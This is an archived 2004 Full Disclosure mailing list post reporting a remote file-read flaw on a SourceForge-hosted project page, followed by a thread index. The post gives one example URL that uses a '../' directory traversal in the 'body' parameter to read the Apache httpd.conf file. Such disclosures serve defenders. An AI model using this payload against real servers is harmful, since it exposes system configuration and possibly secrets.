
Full Disclosure mailing list archives
Vulnerability in sourceforge.net
From: "Alexander" <Pigrelax () yandex ru>
Date: Wed, 21 Jul 2004 09:36:21 +0400
Vulnerability in sourceforge.net. Remote user can read any files. Example: http://btmgr.sourceforge.net/index.php3?body=../../../../../../usr/local /apache/conf/httpd.conf ------------------------------------------------------------------------ ---------- www.Maxpatrol.com - MaxPatrol is a professional network security scanner distinguished by its uncompromisingly high quality of scanning, optimized for effective use by companies of any size (serving from a few to tens of thousands of nodes). _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Current thread:
- Vulnerability in sourceforge.net Alexander (Jul 21)
- Re: Vulnerability in sourceforge.net nicolas vigier (Jul 21)
- RE: Vulnerability in sourceforge.net Todd Towles (Jul 21)
- Re: Vulnerability in sourceforge.net nicolas vigier (Jul 21)
- RE: Vulnerability in sourceforge.net Todd Towles (Jul 21)
- Message not available
- Re: Vulnerability in sourceforge.net nicolas vigier (Jul 21)
- Re: Vulnerability in sourceforge.net Buick Sk (Jul 21)
- RE: Vulnerability in sourceforge.net Todd Towles (Jul 21)
- Re: Vulnerability in sourceforge.net nicolas vigier (Jul 21)
- <Possible follow-ups>
- RE: Vulnerability in sourceforge.net Andrew Poodle (Jul 21)
- Re: Vulnerability in sourceforge.net Dan Duplito (Jul 21)
- RE: Vulnerability in sourceforge.net Todd Towles (Jul 22)
- Re: Vulnerability in sourceforge.net Gregory A. Gilliss (Jul 22)
- RE: Vulnerability in sourceforge.net Todd Towles (Jul 22)